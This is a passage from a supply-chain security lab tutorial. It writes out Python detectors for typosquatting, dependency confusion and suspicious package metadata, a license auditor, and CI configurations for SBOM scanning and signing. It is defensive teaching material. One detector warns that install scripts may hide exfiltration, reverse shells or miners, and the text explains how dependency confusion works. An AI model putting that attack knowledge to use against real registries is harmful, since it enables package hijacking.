print("Usage: python typosquat_detector.py <sbom-cdx.json> [...]")
sys.exit(1)
for path in sys.argv[1:]:
findings = detect_typosquats(path)
print_typosquat_report(findings, path)
TYPOSQUAT
chmod +x ~/lab31-sbom/scripts/typosquat_detector.py
Run:
python3 ~/lab31-sbom/scripts/typosquat_detector.py \
sboms/web-portal-syft-cdx.json \
sboms/data-pipeline-syft-cdx.json
Real-World Enhancement
In production, enhance this detector with:
- Keyboard distance analysis — characters that are adjacent on QWERTY keyboards are common typos
- Homoglyph detection — Unicode characters that look like ASCII (e.g.,
rеquestswith Cyrillicе) - Historical name analysis — packages that were recently renamed or transferred ownership
- Download count comparison — legitimate packages have orders of magnitude more downloads
4.2 — Dependency Confusion Detection¶
cat > ~/lab31-sbom/scripts/dep_confusion_detector.py << 'DEP_CONFUSION'
#!/usr/bin/env python3
"""
Dependency Confusion Detector — Identifies packages at risk of
dependency confusion attacks (internal names that could collide
with public registry packages).
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
import re
# ── Simulated internal package registry (nexus.internal.example.com) ──
INTERNAL_PACKAGES = {
"npm": [
"@meridian/auth-utils",
"@meridian/config-loader",
"@meridian/logging",
"@meridian/crypto-helpers",
"@meridian/rate-limiter",
"meridian-common",
"meridian-db-client",
"meridian-queue-worker",
],
"pypi": [
"meridian-auth",
"meridian-config",
"meridian-utils",
"meridian-data-models",
"internal-crypto",
"corp-logging",
],
"maven": [
"com.meridian:auth-service",
"com.meridian:common-utils",
"com.meridian:config-client",
"com.meridian.internal:crypto",
],
}
# ── Indicators of dependency confusion risk ──
RISK_INDICATORS = {
"no_scope": "Package lacks a scoped namespace (@org/pkg) — vulnerable to public squatting",
"internal_prefix": "Package uses an internal naming convention that may not be reserved on public registry",
"private_not_set": "Package.json does not set 'private: true' — npm publish could leak it",
"no_registry_lock": "No .npmrc or pip.conf restricting package sources",
"version_conflict": "Internal package version < public package version — pip/npm may prefer the public one",
}
def check_dependency_confusion(sbom_path: str) -> list[dict]:
"""Analyze SBOM components for dependency confusion risks."""
with open(sbom_path) as f:
data = json.load(f)
findings = []
for comp in data.get("components", []):
name = comp.get("name", "")
purl = comp.get("purl", "")
version = comp.get("version", "unknown")
risks = []
# Check if it looks like an internal package
internal_patterns = [
r"^@meridian/",
r"^meridian-",
r"^internal-",
r"^corp-",
r"^com\.meridian",
]
is_internal = any(re.match(p, name, re.IGNORECASE) for p in internal_patterns)
if is_internal:
# Check for scoping (npm)
if "pkg:npm/" in purl and not name.startswith("@"):
risks.append({
"indicator": "no_scope",
"detail": RISK_INDICATORS["no_scope"],
"severity": "HIGH",
"recommendation": f"Rename '{name}' to '@meridian/{name}' and reserve the scoped name on npmjs.com",
})
# Check naming convention
risks.append({
"indicator": "internal_prefix",
"detail": RISK_INDICATORS["internal_prefix"],
"severity": "MEDIUM",
"recommendation": f"Register '{name}' as a placeholder on the public registry to prevent squatting",
})
if risks:
findings.append({
"component": name,
"version": version,
"purl": purl,
"is_internal": is_internal,
"risks": risks,
})
return findings
def print_confusion_report(findings: list[dict], sbom_name: str):
"""Display dependency confusion analysis results."""
print(f"\n{'='*70}")
print(f"Dependency Confusion Analysis: {sbom_name}")
print(f"{'='*70}")
if not findings:
print(f" ✓ No dependency confusion risks detected.")
print(f" NOTE: Ensure .npmrc / pip.conf restricts package sources.")
return
print(f" ⚠ {len(findings)} component(s) with dependency confusion risk\n")
for f in findings:
print(f" Component: {f['component']}@{f['version']}")
print(f" PURL: {f['purl']}")
for risk in f["risks"]:
print(f" [{risk['severity']}] {risk['indicator']}")
print(f" {risk['detail']}")
print(f" Fix: {risk['recommendation']}")
print()
print(f" --- Mitigation Checklist ---")
print(f" [ ] Reserve internal package names on public registries")
print(f" [ ] Use scoped packages (@org/pkg) for all internal npm packages")
print(f" [ ] Configure .npmrc with registry=https://nexus.internal.example.com/npm/")
print(f" [ ] Configure pip.conf with --index-url https://nexus.internal.example.com/pypi/simple/")
print(f" [ ] Set 'private: true' in all internal package.json files")
print(f" [ ] Use Maven settings.xml to restrict repository sources")
print(f" [ ] Enable Artifactory/Nexus 'exclude' rules for internal namespaces on remote repos")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python dep_confusion_detector.py <sbom-cdx.json> [...]")
sys.exit(1)
for path in sys.argv[1:]:
findings = check_dependency_confusion(path)
print_confusion_report(findings, path)
DEP_CONFUSION
chmod +x ~/lab31-sbom/scripts/dep_confusion_detector.py
4.3 — Package Metadata Anomaly Detection¶
cat > ~/lab31-sbom/scripts/metadata_anomaly.py << 'METADATA'
#!/usr/bin/env python3
"""
Package Metadata Anomaly Detector — Identifies suspicious metadata patterns
that may indicate a compromised or malicious package.
Lab 31: SBOM Analysis & Supply Chain Security
Detection patterns inspired by Phylum and Socket.dev research.
"""
import json
import sys
from datetime import datetime, timedelta
from dataclasses import dataclass
@dataclass
class MetadataAnomaly:
component: str
version: str
anomaly_type: str
severity: str
detail: str
recommendation: str
# ── Synthetic package metadata (simulates registry API responses) ──
PACKAGE_METADATA = {
"express": {
"first_published": "2010-12-29",
"latest_publish": "2024-03-25",
"maintainer_count": 3,
"maintainer_changes_90d": 0,
"weekly_downloads": 32000000,
"has_install_scripts": False,
"repo_url": "https://github.com/expressjs/express",
"repo_stars": 64000,
"license": "MIT",
"deprecated": False,
},
"lodash": {
"first_published": "2012-04-12",
"latest_publish": "2021-02-20",
"maintainer_count": 2,
"maintainer_changes_90d": 0,
"weekly_downloads": 52000000,
"has_install_scripts": False,
"repo_url": "https://github.com/lodash/lodash",
"repo_stars": 59000,
"license": "MIT",
"deprecated": False,
},
"synth-suspicious-pkg": {
"first_published": "2026-04-10",
"latest_publish": "2026-04-11",
"maintainer_count": 1,
"maintainer_changes_90d": 1,
"weekly_downloads": 47,
"has_install_scripts": True,
"repo_url": "",
"repo_stars": 0,
"license": "NOASSERTION",
"deprecated": False,
},
"synth-hijacked-pkg": {
"first_published": "2020-06-15",
"latest_publish": "2026-04-08",
"maintainer_count": 1,
"maintainer_changes_90d": 2,
"weekly_downloads": 1200,
"has_install_scripts": True,
"repo_url": "https://github.internal.example.com/unknown-user/hijacked-pkg",
"repo_stars": 3,
"license": "MIT",
"deprecated": False,
},
}
def check_anomalies(pkg_name: str, metadata: dict) -> list[MetadataAnomaly]:
"""Check package metadata for suspicious patterns."""
anomalies = []
today = datetime(2026, 4, 12)
# 1. Recently published package (< 30 days old)
first_pub = datetime.strptime(metadata["first_published"], "%Y-%m-%d")
age_days = (today - first_pub).days
if age_days < 30:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="NEW_PACKAGE",
severity="HIGH",
detail=f"Package is only {age_days} days old (first published: {metadata['first_published']})",
recommendation="Manually review package source code before use. New packages are high-risk for supply chain attacks.",
))
# 2. Low download count
if metadata["weekly_downloads"] < 100:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="LOW_POPULARITY",
severity="MEDIUM",
detail=f"Weekly downloads: {metadata['weekly_downloads']} (threshold: 100)",
recommendation="Low-download packages are more likely to be malicious. Verify the package serves a legitimate purpose.",
))
# 3. Maintainer changes in last 90 days
if metadata["maintainer_changes_90d"] > 0:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="MAINTAINER_CHANGE",
severity="HIGH",
detail=f"Maintainer changed {metadata['maintainer_changes_90d']} time(s) in the last 90 days",
recommendation="Account takeover is a common supply chain vector. Verify the new maintainer is legitimate.",
))
# 4. Install scripts present
if metadata["has_install_scripts"]:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="INSTALL_SCRIPTS",
severity="HIGH",
detail="Package contains install scripts (preinstall/postinstall hooks)",
recommendation="Install scripts execute arbitrary code during 'npm install'. Review the scripts for malicious behavior (data exfiltration, reverse shells, crypto miners).",
))
# 5. No repository URL
if not metadata["repo_url"]:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="NO_REPOSITORY",
severity="MEDIUM",
detail="No source code repository linked",
recommendation="Packages without linked repositories cannot be audited. Avoid using packages with no verifiable source.",
))
# 6. No license declared
if metadata["license"] in ["NOASSERTION", "", None]:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="NO_LICENSE",
severity="LOW",
detail="No license declared",
recommendation="Packages without licenses have undefined usage rights and may indicate a throwaway/malicious package.",
))
# 7. Single maintainer
if metadata["maintainer_count"] <= 1:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="SINGLE_MAINTAINER",
severity="LOW",
detail="Package has a single maintainer (bus factor = 1)",
recommendation="Single-maintainer packages are high-risk for account takeover. Consider pinning versions and monitoring for unexpected updates.",
))
return anomalies
def analyze_sbom_metadata(sbom_path: str) -> list[MetadataAnomaly]:
"""Analyze all components in an SBOM for metadata anomalies."""
with open(sbom_path) as f:
data = json.load(f)
all_anomalies = []
for comp in data.get("components", []):
name = comp.get("name", "")
if name in PACKAGE_METADATA:
anomalies = check_anomalies(name, PACKAGE_METADATA[name])
all_anomalies.extend(anomalies)
return all_anomalies
def print_anomaly_report(anomalies: list[MetadataAnomaly], sbom_name: str):
"""Display metadata anomaly findings."""
print(f"\n{'='*70}")
print(f"Package Metadata Anomaly Report: {sbom_name}")
print(f"{'='*70}")
if not anomalies:
print(f" ✓ No metadata anomalies detected.")
return
print(f" {len(anomalies)} anomaly/anomalies detected\n")
severity_order = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}
for a in sorted(anomalies, key=lambda x: severity_order.get(x.severity, 99)):
icon = {"HIGH": "🔴", "MEDIUM": "🟡", "LOW": "🔵"}.get(a.severity, "⚪")
print(f" [{a.severity}] {a.anomaly_type} — {a.component}")
print(f" {a.detail}")
print(f" Action: {a.recommendation}")
print()
if __name__ == "__main__":
if len(sys.argv) < 2:
# Demo mode with synthetic data
print("Running in demo mode with synthetic package metadata...")
for pkg_name, metadata in PACKAGE_METADATA.items():
anomalies = check_anomalies(pkg_name, metadata)
if anomalies:
print(f"\n--- {pkg_name} ---")
for a in anomalies:
print(f" [{a.severity}] {a.anomaly_type}: {a.detail}")
else:
for path in sys.argv[1:]:
anomalies = analyze_sbom_metadata(path)
print_anomaly_report(anomalies, path)
METADATA
chmod +x ~/lab31-sbom/scripts/metadata_anomaly.py
Run in demo mode:
Expected output:
Running in demo mode with synthetic package metadata...
--- synth-suspicious-pkg ---
[HIGH] NEW_PACKAGE: Package is only 2 days old (first published: 2026-04-10)
[HIGH] MAINTAINER_CHANGE: Maintainer changed 1 time(s) in the last 90 days
[HIGH] INSTALL_SCRIPTS: Package contains install scripts (preinstall/postinstall hooks)
[MEDIUM] LOW_POPULARITY: Weekly downloads: 47 (threshold: 100)
[MEDIUM] NO_REPOSITORY: No source code repository linked
[LOW] NO_LICENSE: No license declared
[LOW] SINGLE_MAINTAINER: Package has a single maintainer (bus factor = 1)
--- synth-hijacked-pkg ---
[HIGH] MAINTAINER_CHANGE: Maintainer changed 2 time(s) in the last 90 days
[HIGH] INSTALL_SCRIPTS: Package contains install scripts (preinstall/postinstall hooks)
[LOW] SINGLE_MAINTAINER: Package has a single maintainer (bus factor = 1)
Production Enhancements
For real-world deployment, integrate with:
- Socket.dev API — real-time package risk scoring with install script analysis
- Phylum CLI — automated package analysis in CI/CD
- npm audit signatures — verify package provenance via Sigstore
- pip-audit — Python-specific vulnerability and metadata analysis
- Snyk Advisor — package health scoring across ecosystems
Phase 5: License Compliance¶
Objective¶
Extract license information from SBOMs, identify copyleft vs permissive licenses, detect conflicts, and build a compliance matrix.
5.1 — License Extraction and Classification¶
cat > ~/lab31-sbom/scripts/license_audit.py << 'LICENSE_AUDIT'
#!/usr/bin/env python3
"""
License Compliance Auditor — Extracts and classifies licenses from SBOMs,
detects conflicts, and generates compliance reports.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from dataclasses import dataclass, field
from enum import Enum
class LicenseCategory(Enum):
PERMISSIVE = "permissive"
WEAK_COPYLEFT = "weak-copyleft"
STRONG_COPYLEFT = "strong-copyleft"
COMMERCIAL = "commercial"
PUBLIC_DOMAIN = "public-domain"
UNKNOWN = "unknown"
PROHIBITED = "prohibited"
# ── License classification database ──
LICENSE_DB = {
# Permissive licenses
"MIT": LicenseCategory.PERMISSIVE,
"Apache-2.0": LicenseCategory.PERMISSIVE,
"BSD-2-Clause": LicenseCategory.PERMISSIVE,
"BSD-3-Clause": LicenseCategory.PERMISSIVE,
"ISC": LicenseCategory.PERMISSIVE,
"0BSD": LicenseCategory.PERMISSIVE,
"Unlicense": LicenseCategory.PUBLIC_DOMAIN,
"CC0-1.0": LicenseCategory.PUBLIC_DOMAIN,
"WTFPL": LicenseCategory.PERMISSIVE,
"Zlib": LicenseCategory.PERMISSIVE,
# Weak copyleft
"LGPL-2.0-only": LicenseCategory.WEAK_COPYLEFT,
"LGPL-2.1-only": LicenseCategory.WEAK_COPYLEFT,
"LGPL-3.0-only": LicenseCategory.WEAK_COPYLEFT,
"MPL-2.0": LicenseCategory.WEAK_COPYLEFT,
"EPL-2.0": LicenseCategory.WEAK_COPYLEFT,
"CDDL-1.0": LicenseCategory.WEAK_COPYLEFT,
# Strong copyleft
"GPL-2.0-only": LicenseCategory.STRONG_COPYLEFT,
"GPL-3.0-only": LicenseCategory.STRONG_COPYLEFT,
"AGPL-3.0-only": LicenseCategory.STRONG_COPYLEFT,
# Prohibited (example enterprise policy)
"SSPL-1.0": LicenseCategory.PROHIBITED,
"Commons-Clause": LicenseCategory.PROHIBITED,
}
# ── Enterprise license policy ──
ENTERPRISE_POLICY = {
"allowed": [
LicenseCategory.PERMISSIVE,
LicenseCategory.PUBLIC_DOMAIN,
],
"review_required": [
LicenseCategory.WEAK_COPYLEFT,
],
"prohibited": [
LicenseCategory.STRONG_COPYLEFT,
LicenseCategory.PROHIBITED,
],
"unknown_action": "BLOCK", # BLOCK or REVIEW
}
@dataclass
class LicenseResult:
component: str
version: str
license_id: str
category: LicenseCategory
policy_status: str # ALLOWED, REVIEW, PROHIBITED, UNKNOWN
detail: str = ""
def classify_license(license_id: str) -> LicenseCategory:
"""Classify a license identifier into a category."""
if not license_id or license_id in ["NOASSERTION", "NONE", ""]:
return LicenseCategory.UNKNOWN
# Normalize common variations
normalized = license_id.strip()
if normalized in LICENSE_DB:
return LICENSE_DB[normalized]
# Try without -only/-or-later suffix
for suffix in ["-only", "-or-later"]:
if normalized.endswith(suffix):
base = normalized[:-len(suffix)]
if base in LICENSE_DB:
return LICENSE_DB[base]
return LicenseCategory.UNKNOWN
def check_policy(category: LicenseCategory) -> str:
"""Check license category against enterprise policy."""
if category in ENTERPRISE_POLICY["allowed"]:
return "ALLOWED"
elif category in ENTERPRISE_POLICY["review_required"]:
return "REVIEW"
elif category in ENTERPRISE_POLICY["prohibited"]:
return "PROHIBITED"
else:
return "UNKNOWN"
def audit_sbom_licenses(sbom_path: str) -> list[LicenseResult]:
"""Extract and classify all licenses from a CycloneDX SBOM."""
with open(sbom_path) as f:
data = json.load(f)
results = []
for comp in data.get("components", []):
name = comp.get("name", "UNKNOWN")
version = comp.get("version", "UNKNOWN")
licenses = []
for lic in comp.get("licenses", []):
if "license" in lic:
license_id = lic["license"].get("id", lic["license"].get("name", "NOASSERTION"))
licenses.append(license_id)
elif "expression" in lic:
licenses.append(lic["expression"])
if not licenses:
licenses = ["NOASSERTION"]
for license_id in licenses:
category = classify_license(license_id)
policy_status = check_policy(category)
detail = ""
if policy_status == "PROHIBITED":
detail = f"License '{license_id}' is PROHIBITED by enterprise policy. Remove this dependency or obtain legal exception."
elif policy_status == "REVIEW":
detail = f"License '{license_id}' requires legal review before use in commercial products."
elif policy_status == "UNKNOWN":
detail = f"License '{license_id}' is not in the classification database. Manual review required."
results.append(LicenseResult(
component=name,
version=version,
license_id=license_id,
category=category,
policy_status=policy_status,
detail=detail,
))
return results
def print_license_report(results: list[LicenseResult], sbom_name: str):
"""Generate a formatted license compliance report."""
print(f"\n{'='*70}")
print(f"License Compliance Report: {sbom_name}")
print(f"{'='*70}")
print(f"Total components analyzed: {len(results)}")
# Category breakdown
category_counts = {}
for r in results:
cat = r.category.value
category_counts[cat] = category_counts.get(cat, 0) + 1
print(f"\nLicense Category Distribution:")
for cat, count in sorted(category_counts.items()):
bar = "█" * count
print(f" {cat:<20} {count:>3} {bar}")
# Policy compliance summary
policy_counts = {}
for r in results:
policy_counts[r.policy_status] = policy_counts.get(r.policy_status, 0) + 1
print(f"\nPolicy Compliance:")
status_icons = {"ALLOWED": "✓", "REVIEW": "⚠", "PROHIBITED": "✗", "UNKNOWN": "?"}
for status in ["ALLOWED", "REVIEW", "PROHIBITED", "UNKNOWN"]:
count = policy_counts.get(status, 0)
icon = status_icons.get(status, " ")
print(f" {icon} {status:<12} {count:>3}")
# Detailed findings for non-ALLOWED
issues = [r for r in results if r.policy_status != "ALLOWED"]
if issues:
print(f"\n--- Action Items ---")
for r in sorted(issues, key=lambda x: {"PROHIBITED": 0, "UNKNOWN": 1, "REVIEW": 2}.get(x.policy_status, 99)):
icon = {"PROHIBITED": "🔴", "UNKNOWN": "🟡", "REVIEW": "🔵"}.get(r.policy_status, "⚪")
print(f"\n [{r.policy_status}] {r.component}@{r.version}")
print(f" License: {r.license_id} ({r.category.value})")
if r.detail:
print(f" Action: {r.detail}")
else:
print(f"\n ✓ All components comply with enterprise license policy.")
# Compliance matrix
print(f"\n--- Compliance Matrix ---")
print(f" {'Component':<30} {'Version':<12} {'License':<20} {'Category':<18} {'Status':<12}")
print(f" {'-'*30} {'-'*12} {'-'*20} {'-'*18} {'-'*12}")
for r in sorted(results, key=lambda x: x.component):
status_marker = {"ALLOWED": " ", "REVIEW": "⚠ ", "PROHIBITED": "✗ ", "UNKNOWN": "? "}.get(r.policy_status, " ")
print(f" {status_marker}{r.component:<28} {r.version:<12} {r.license_id:<20} {r.category.value:<18} {r.policy_status:<12}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python license_audit.py <sbom-cdx.json> [...]")
sys.exit(1)
all_results = []
for path in sys.argv[1:]:
results = audit_sbom_licenses(path)
print_license_report(results, path)
all_results.extend(results)
# Cross-application summary
if len(sys.argv) > 2:
print(f"\n{'='*70}")
print(f"AGGREGATE LICENSE COMPLIANCE SUMMARY")
print(f"{'='*70}")
total = len(all_results)
prohibited = sum(1 for r in all_results if r.policy_status == "PROHIBITED")
review = sum(1 for r in all_results if r.policy_status == "REVIEW")
unknown = sum(1 for r in all_results if r.policy_status == "UNKNOWN")
allowed = sum(1 for r in all_results if r.policy_status == "ALLOWED")
compliance_rate = allowed / total * 100 if total > 0 else 0
print(f"Total components: {total}")
print(f"Compliance rate: {compliance_rate:.1f}%")
print(f"Blocked: {prohibited}")
print(f"Review needed: {review}")
print(f"Unclassified: {unknown}")
if prohibited > 0:
print(f"\n⚠ {prohibited} component(s) use PROHIBITED licenses.")
print(f" These MUST be removed or replaced before release.")
LICENSE_AUDIT
chmod +x ~/lab31-sbom/scripts/license_audit.py
Run:
cd ~/lab31-sbom && python3 scripts/license_audit.py \
sboms/web-portal-syft-cdx.json \
sboms/data-pipeline-syft-cdx.json \
sboms/api-gateway-syft-cdx.json
Expected output (web portal excerpt):
======================================================================
License Compliance Report: sboms/web-portal-syft-cdx.json
======================================================================
Total components analyzed: 26
License Category Distribution:
permissive 22 ██████████████████████
unknown 3 ███
public-domain 1 █
Policy Compliance:
✓ ALLOWED 23
⚠ REVIEW 0
✗ PROHIBITED 0
? UNKNOWN 3
--- Action Items ---
[UNKNOWN] swagger-ui-express@5.0.0
License: NOASSERTION (unknown)
Action: License 'NOASSERTION' is not in the classification database. Manual review required.
...
5.2 — License Conflict Detection¶
Common License Conflicts
| Combination | Conflict? | Explanation |
|---|---|---|
| MIT + Apache-2.0 | No | Both permissive, compatible |
| MIT + GPL-3.0 | Yes (if distributing) | GPL requires derivative works to be GPL |
| Apache-2.0 + GPL-2.0 | Yes | Apache-2.0 patent clause incompatible with GPL-2.0 |
| LGPL-2.1 + MIT | No (if dynamically linked) | LGPL allows linking with permissive code |
| AGPL-3.0 + anything proprietary | Yes | AGPL requires source disclosure for network use |
| BSD-3-Clause + MIT | No | Both permissive |
When your SBOM includes components with conflicting licenses, you must either:
- Replace the conflicting component with a compatible alternative
- Obtain a commercial license exception from the copyright holder
- Restructure the application to isolate GPL-licensed components (e.g., separate microservice)
Phase 6: CI/CD Integration¶
Objective¶
Integrate SBOM generation, vulnerability scanning, attestation, and VEX document creation into an automated CI/CD pipeline.
6.1 — GitHub Actions SBOM Pipeline¶
cat > ~/lab31-sbom/ci/sbom-pipeline.yml << 'PIPELINE'
# .github/workflows/sbom-pipeline.yml
# SBOM Generation, Scanning, and Attestation Pipeline
# Meridian Software Corp — internal.example.com
# Auth: testuser / REDACTED
name: SBOM Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
schedule:
# Weekly rescan for new vulnerabilities
- cron: '0 6 * * 1'
permissions:
contents: read
security-events: write
id-token: write # Required for Sigstore cosign
packages: write
attestations: write
env:
REGISTRY: registry.internal.example.com
SBOM_SERVER: https://sbom-server.internal.example.com
NVD_API_KEY: ${{ secrets.NVD_API_KEY }}
jobs:
# ── Stage 1: Generate SBOMs ──
generate-sbom:
runs-on: ubuntu-latest
strategy:
matrix:
app:
- name: meridian-web-portal
path: apps/meridian-web-portal
type: node
- name: meridian-data-pipeline
path: apps/meridian-data-pipeline
type: python
- name: meridian-api-gateway
path: apps/meridian-api-gateway
type: java
steps:
- uses: actions/checkout@v4
- name: Install Syft
uses: anchore/sbom-action/download-syft@v0
- name: Generate CycloneDX SBOM
run: |
syft scan dir:${{ matrix.app.path }} \
--output cyclonedx-json=sbom-${{ matrix.app.name }}-cdx.json \
--name "${{ matrix.app.name }}" \
--version "${{ github.sha }}"
- name: Generate SPDX SBOM
run: |
syft scan dir:${{ matrix.app.path }} \
--output spdx-json=sbom-${{ matrix.app.name }}-spdx.json \
--name "${{ matrix.app.name }}" \
--version "${{ github.sha }}"
- name: Upload SBOM Artifacts
uses: actions/upload-artifact@v4
with:
name: sbom-${{ matrix.app.name }}
path: |
sbom-${{ matrix.app.name }}-cdx.json
sbom-${{ matrix.app.name }}-spdx.json
# ── Stage 2: Vulnerability Scan ──
vulnerability-scan:
needs: generate-sbom
runs-on: ubuntu-latest
strategy:
matrix:
app: [meridian-web-portal, meridian-data-pipeline, meridian-api-gateway]
steps:
- name: Download SBOM
uses: actions/download-artifact@v4
with:
name: sbom-${{ matrix.app }}
- name: Install Grype
uses: anchore/scan-action/download-grype@v4
- name: Scan for Vulnerabilities
run: |
grype sbom:sbom-${{ matrix.app }}-cdx.json \
--output json \
--file vuln-report-${{ matrix.app }}.json \
--fail-on critical
- name: Upload Vulnerability Report
if: always()
uses: actions/upload-artifact@v4
with:
name: vuln-${{ matrix.app }}
path: vuln-report-${{ matrix.app }}.json
- name: Upload SARIF to GitHub Security
if: always()
run: |
grype sbom:sbom-${{ matrix.app }}-cdx.json \
--output sarif \
--file vuln-${{ matrix.app }}.sarif
- name: Upload SARIF
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: vuln-${{ matrix.app }}.sarif
category: sbom-${{ matrix.app }}
# ── Stage 3: License Compliance ──
license-check:
needs: generate-sbom
runs-on: ubuntu-latest
strategy:
matrix:
app: [meridian-web-portal, meridian-data-pipeline, meridian-api-gateway]
steps:
- uses: actions/checkout@v4
- name: Download SBOM
uses: actions/download-artifact@v4
with:
name: sbom-${{ matrix.app }}
- name: Setup Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run License Audit
run: |
python scripts/license_audit.py sbom-${{ matrix.app }}-cdx.json \
| tee license-report-${{ matrix.app }}.txt
- name: Check for Prohibited Licenses
run: |
if grep -q "PROHIBITED" license-report-${{ matrix.app }}.txt; then
echo "::error::Prohibited license detected in ${{ matrix.app }}"
exit 1
fi
# ── Stage 4: SBOM Attestation with Sigstore ──
attest:
needs: [vulnerability-scan, license-check]
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main'
strategy:
matrix:
app: [meridian-web-portal, meridian-data-pipeline, meridian-api-gateway]
steps:
- name: Download SBOM
uses: actions/download-artifact@v4
with:
name: sbom-${{ matrix.app }}
- name: Install cosign
uses: sigstore/cosign-installer@v3
- name: Sign SBOM with Sigstore (Keyless)
run: |
cosign attest-blob \
--predicate sbom-${{ matrix.app }}-cdx.json \
--type cyclonedx \
--bundle sbom-${{ matrix.app }}-attestation.json \
--yes
- name: Upload Attestation
uses: actions/upload-artifact@v4
with:
name: attestation-${{ matrix.app }}
path: sbom-${{ matrix.app }}-attestation.json
- name: Publish SBOM to SBOM Server
run: |
echo "Publishing SBOM to ${SBOM_SERVER}/api/v1/sbom"
# curl -X POST "${SBOM_SERVER}/api/v1/sbom" \
# -H "Authorization: Bearer ${SBOM_TOKEN}" \
# -H "Content-Type: application/json" \
# -d @sbom-${{ matrix.app }}-cdx.json
echo "SBOM published successfully (simulated)"
# ── Stage 5: Generate VEX Document ──
generate-vex:
needs: vulnerability-scan
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main'
steps:
- uses: actions/checkout@v4
- name: Download All Vulnerability Reports
uses: actions/download-artifact@v4
with:
pattern: vuln-*
merge-multiple: true
- name: Generate VEX Document
run: |
python scripts/generate_vex.py \
--vulns vuln-report-*.json \
--output vex-document.json
- name: Upload VEX Document
uses: actions/upload-artifact@v4
with:
name: vex-document
path: vex-document.json
PIPELINE
6.2 — CI/CD Pipeline Architecture¶
flowchart TB
subgraph "Trigger"
A[Git Push / PR / Schedule]
end
subgraph "Stage 1: SBOM Generation"
B1[Syft Scan<br/>npm app]
B2[Syft Scan<br/>pip app]
B3[Syft Scan<br/>Maven app]
B1 --> C1[CycloneDX JSON]
B1 --> C2[SPDX JSON]
B2 --> C3[CycloneDX JSON]
B2 --> C4[SPDX JSON]
B3 --> C5[CycloneDX JSON]
B3 --> C6[SPDX JSON]
end
subgraph "Stage 2: Vulnerability Scan"
D1[Grype Scan] --> E1[Vuln Report JSON]
D1 --> E2[SARIF Upload]
E2 --> F1[GitHub Security Tab]
end
subgraph "Stage 3: License Check"
G1[License Audit] --> H1{Prohibited?}
H1 -->|Yes| I1[FAIL Pipeline]
H1 -->|No| I2[PASS]
end
subgraph "Stage 4: Attestation"
J1[cosign attest-blob] --> K1[Sigstore Bundle]
K1 --> L1[SBOM Server]
end
subgraph "Stage 5: VEX"
M1[Generate VEX] --> N1[VEX Document]
end
A --> B1 & B2 & B3
C1 & C3 & C5 --> D1
C1 & C3 & C5 --> G1
D1 & I2 --> J1
E1 --> M1
style I1 fill:#d32f2f,color:#fff
style I2 fill:#388e3c,color:#fff
style K1 fill:#1565c0,color:#fff
style F1 fill:#7b1fa2,color:#fff 6.3 — Dependabot Configuration¶
cat > ~/lab31-sbom/ci/dependabot.yml << 'DEPENDABOT'
# .github/dependabot.yml
# Automated dependency update configuration
# Meridian Software Corp — internal.example.com
version: 2
registries:
npm-internal:
type: npm-registry
url: https://nexus.internal.example.com/npm/
token: ${{ secrets.NEXUS_TOKEN }}
pypi-internal:
type: python-index
url: https://nexus.internal.example.com/pypi/simple/
username: testuser
password: ${{ secrets.NEXUS_PASSWORD }}
updates:
# npm dependencies
- package-ecosystem: "npm"
directory: "/apps/meridian-web-portal"
schedule:
interval: "weekly"
day: "monday"
time: "06:00"
timezone: "America/New_York"
open-pull-requests-limit: 10
reviewers:
- "security-team"
labels:
- "dependencies"
- "security"
- "auto-update"
commit-message:
prefix: "deps(npm)"
registries:
- npm-internal
groups:
production-deps:
patterns:
- "*"
exclude-patterns:
- "@types/*"
- "eslint*"
- "jest*"
- "typescript"
update-types:
- "minor"
- "patch"
dev-deps:
patterns:
- "@types/*"
- "eslint*"
- "jest*"
- "typescript"
ignore:
# Ignore major version updates without manual review
- dependency-name: "*"
update-types: ["version-update:semver-major"]
# pip dependencies
- package-ecosystem: "pip"
directory: "/apps/meridian-data-pipeline"
schedule:
interval: "weekly"
day: "monday"
time: "06:00"
open-pull-requests-limit: 10
reviewers:
- "security-team"
labels:
- "dependencies"
- "security"
- "auto-update"
commit-message:
prefix: "deps(pip)"
registries:
- pypi-internal
# Maven dependencies
- package-ecosystem: "maven"
directory: "/apps/meridian-api-gateway"
schedule:
interval: "weekly"
day: "monday"
time: "06:00"
open-pull-requests-limit: 10
reviewers:
- "security-team"
labels:
- "dependencies"
- "security"
- "auto-update"
commit-message:
prefix: "deps(maven)"
# GitHub Actions
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
labels:
- "ci"
- "dependencies"
DEPENDABOT
6.4 — Renovate Configuration (Alternative to Dependabot)¶
cat > ~/lab31-sbom/ci/renovate.json << 'RENOVATE'
{
"$schema": "https://docs.renovatebot.com/renovate-schema.json",
"description": "Renovate configuration for Meridian Software Corp",
"extends": [
"config:recommended",
"security:openssf-scorecard",
":dependencyDashboard",
":semanticCommits"
],
"registryAliases": {
"npm-internal": "https://nexus.internal.example.com/npm/",
"pypi-internal": "https://nexus.internal.example.com/pypi/simple/"
},
"timezone": "America/New_York",
"schedule": ["before 8am on Monday"],
"prHourlyLimit": 5,
"prConcurrentLimit": 15,
"labels": ["dependencies", "security", "auto-update"],
"reviewers": ["security-team"],
"vulnerabilityAlerts": {
"enabled": true,
"labels": ["security-alert"],
"schedule": ["at any time"]
},
"packageRules": [
{
"description": "Auto-merge patch updates for production deps",
"matchUpdateTypes": ["patch"],
"matchDepTypes": ["dependencies"],
"automerge": true,
"automergeType": "pr",
"automergeStrategy": "squash",
"platformAutomerge": true
},
{
"description": "Group all dev dependency updates",
"matchDepTypes": ["devDependencies"],
